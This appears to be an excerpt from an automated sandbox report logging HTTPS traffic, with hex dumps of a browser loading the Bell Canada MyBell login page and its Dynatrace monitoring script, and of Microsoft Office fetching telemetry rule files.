                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Nov 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 07 Jun 2021 19:46:18 GMT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      ETag: "1D75BD5C8752100"
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 12306
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000bcaf99f4be6098e4ce308445bf972ba95a6af9afdf820db2806113c67c31bccd085c0e3f11113000053e60539ba34552cf3beb705bee870bcdec26dcba0090bfa1b75a949015934cf50ca25c935aeff69410e716cce3a979; Path=/
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC12306INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 0a 07 07 07 08 07 0a 08 08 0a 0f 0a 08 0a 0f 12 0d 0a 0a 0d 12 14 10 10 12 10 10 14 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0b 0c 0c 15 13 15 22 18 18 22 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 67 00 b3 03 01 11 00 02 11 01 03 11 01 ff c4 00 a6 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 00 02 04 05 06 01 07 08 10 00 02 01 03 01 03 06 05 10 06 09 04 01 05 00 00 01 02 03 00 04 11 12 05 21 31 06 13 22 32 41 51 42 52 71 73 91 07 14 15 23 34 35 61 62 72 81 82 92 b2 b3
                                                                                                                                                                                                                                                                                                                                      Data Ascii: JFIF""g!1"2AQBRqs#45abr


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      64192.168.2.949824206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC3400OUTPOST /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=3160494552&en=gticcd0a&end=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Content-Length: 622
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC622OUTData Raw: 24 61 3d 31 25 37 43 32 25 37 43 5f 65 76 65 6e 74 5f 25 37 43 31 37 33 30 33 38 30 33 31 38 34 34 32 25 37 43 5f 6e 6f 73 72 5f 25 37 43 72 25 37 43 6e 6f 25 32 43 31 25 37 43 33 25 37 43 5f 65 76 65 6e 74 5f 25 37 43 31 37 33 30 33 38 30 33 31 38 34 34 32 25 37 43 5f 73 72 5f 25 37 43 74 79 70 65 25 37 43 69 6e 69 74 25 37 43 66 68 25 37 43 49 43 41 37 4e 51 56 66 67 68 71 72 75 78 24 72 49 64 3d 52 49 44 5f 2d 31 33 31 33 37 39 37 35 35 24 72 70 49 64 3d 2d 31 38 34 37 33 30 33 32 38 30 24 74 76 6e 3d 25 32 46 4c 6f 67 69 6e 24 74 76 74 3d 31 37 33 30 33 38 30 33 31 31 33 36 37 24 74 76 6d 3d 69 31 25 33 42 6b 30 25 33 42 68 30 24 74 76 74 72 67 3d 31 24 77 3d 31 32 38 30 24 68 3d 39 30 37 24 73 77 3d 31 32 38 30 24 73 68 3d 31 30 32 34 24 66 64 3d 74
                                                                                                                                                                                                                                                                                                                                      Data Ascii: $a=1%7C2%7C_event_%7C1730380318442%7C_nosr_%7Cr%7Cno%2C1%7C3%7C_event_%7C1730380318442%7C_sr_%7Ctype%7Cinit%7Cfh%7CICA7NQVfghqrux$rId=RID_-131379755$rpId=-1847303280$tvn=%2FLogin$tvt=1730380311367$tvm=i1%3Bk0%3Bh0$tvtrg=1$w=1280$h=907$sw=1280$sh=1024$fd=t
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC2231INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 121
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20001a66f73555f6bb43b7d3ebf40f23c2f13a09c88a375f621b618cf1e5e8307cd708ad57319711300099eea83e93960480cf3beb705bee870bcdec26dcba0090bfa1b75a949015934cf50ca25c935aeff69410e716cce3a979; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC121INData Raw: 4f 4b 28 4f 41 29 7c 6e 61 6d 65 3d 72 75 78 69 74 61 67 65 6e 74 6a 73 7c 66 65 61 74 75 72 65 48 61 73 68 3d 49 43 41 37 4e 51 56 66 67 68 71 72 75 78 7c 76 65 72 73 69 6f 6e 3d 7c 62 75 69 6c 64 4e 75 6d 62 65 72 3d 31 30 32 39 39 32 34 31 30 30 31 30 38 34 31 34 30 7c 6c 61 73 74 4d 6f 64 69 66 69 63 61 74 69 6f 6e 3d 31 37 33 30 32 37 36 34 37 36 34 32 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: OK(OA)|name=ruxitagentjs|featureHash=ICA7NQVfghqrux|version=|buildNumber=10299241001084140|lastModification=1730276476420


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      65192.168.2.949829206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC2795OUTGET /ruxitagentjs_D_10299241001084140.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC2355INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 31 Oct 2025 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 03 Mar 2010 07:01:40 GMT
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 43211
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20008fdedcc17db78b241ee12850ddab23035bdcba98eebd33873e435beef3cadc2c085fd654b1113000e11ba9ccdd172db8cf3beb705bee870bcdec26dcba0090bfa1b75a949015934cf50ca25c935aeff69410e716cce3a979; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC14029INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 64 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 66 62 28 75 2c 74 29 7b 72 65 74 75 72 6e 20 57 61 28 75 29 26 26 22 68 72 65 66 22 3d 3d 3d 74 3f 31 3a 5a 61 28 75 29 26 26 22 76 61 6c 75 65 22 3d 3d 3d 74 3f 33 32 3a 71 63 2e 51 64 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 41 29 7b 72 65 74 75 72 6e 20 41 2e 74 65 73 74 28 74 29 7d 29 3f 31 36 3a 50 61 28 75 29 26 26 22 76 61 6c 75 65 22 3d 3d 3d 74 3f 32 3d 3d 3d 6d 62 28 75 29 3f 31 36 3a 31 3a 31 7d 66 75 6e 63 74 69 6f 6e 20 6d 62 28 75 29 7b 69 66 28 52 61 28 75 29 7c 7c 52 61 28 75 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 72 65 74 75 72 6e 20 31 3b 71 64 2e 68 61 73 28 75 29 26 26 59 63 2e 73 65 74 28 75 2c 59 63 2e 67 65 74 28 75 29 7c 38 29 3b 61 64 2e 68 61 73 28 75 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function dn(){function fb(u,t){return Wa(u)&&"href"===t?1:Za(u)&&"value"===t?32:qc.Qd.some(function(A){return A.test(t)})?16:Pa(u)&&"value"===t?2===mb(u)?16:1:1}function mb(u){if(Ra(u)||Ra(u.parentNode))return 1;qd.has(u)&&Yc.set(u,Yc.get(u)|8);ad.has(u)
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC16384INData Raw: 61 72 6e 28 22 4d 61 73 6b 69 6e 67 20 73 65 6c 65 63 74 6f 72 20 65 76 61 6c 75 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 22 2b 74 2e 6e 61 6d 65 2c 74 29 2c 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 24 61 28 75 29 7b 75 2e 75 62 3d 75 2e 75 62 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 62 28 74 29 7d 29 3b 75 2e 73 62 3d 75 2e 73 62 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 62 28 74 29 7d 29 3b 75 2e 79 62 3d 75 2e 79 62 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 62 28 74 29 7d 29 3b 72 65 74 75 72 6e 20 75 7d 66 75 6e 63 74 69 6f 6e 20 76 28 75 29 7b 76 61 72 20 74 3d 7b 71 62 3a 21 30 2c 75 62 3a 5b 5d 2c 73 62 3a 5b 5d 2c 79 62 3a 5b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: arn("Masking selector evaluation error: "+t.name,t),!1}}function $a(u){u.ub=u.ub.filter(function(t){return nb(t)});u.sb=u.sb.filter(function(t){return nb(t)});u.yb=u.yb.filter(function(t){return nb(t)});return u}function v(u){var t={qb:!0,ub:[],sb:[],yb:[
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC12798INData Raw: 3d 74 68 69 73 3b 74 68 69 73 2e 24 63 3d 5b 5d 3b 74 68 69 73 2e 50 67 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 50 29 7b 41 2e 77 65 28 50 29 7d 29 3a 74 68 69 73 2e 77 65 28 74 29 7d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 3d 0a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 41 3b 74 3d 74 2e 73 70 6c 69 74 28 22 2c 22 29 3b 32 3d 3d 3d 4e 75 6d 62 65 72 28 74 5b 30 5d 29 3f 41 3d 7b 61 64 3a 74 2e 73 6c 69 63 65 28 30 2c 34 29 2e 6a 6f 69 6e 28 22 2c 22 29 7d 3a 41 3d 7b 52 67 3a 74 2e 73 6c 69 63 65 28 30 2c 35 29 2e 6a 6f 69 6e 28 22 2c 22 29 2c 61 64 3a 74 2e 73 6c 69 63 65 28 35 2c 39 29 2e 6a 6f 69 6e 28 22 2c 22 29 7d 3b 69 66 28 41 2e 61
                                                                                                                                                                                                                                                                                                                                      Data Ascii: =this;this.$c=[];this.Pg=new WeakMap;Array.isArray(t)?t.forEach(function(P){A.we(P)}):this.we(t)}u.prototype.we=function(t){var A;t=t.split(",");2===Number(t[0])?A={ad:t.slice(0,4).join(",")}:A={Rg:t.slice(0,5).join(","),ad:t.slice(5,9).join(",")};if(A.a


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      66192.168.2.94982213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 57989b77-d01e-0049-621c-27e7dc000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131202Z-16849878b78km6fmmkbenhx76n00000008y000000000932h
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      67192.168.2.94982013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9a8e6971-501e-0078-586f-2806cf000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131202Z-15b8d89586fmhjx6a8nf3qm53c00000003e0000000007st7
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      68192.168.2.94981913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
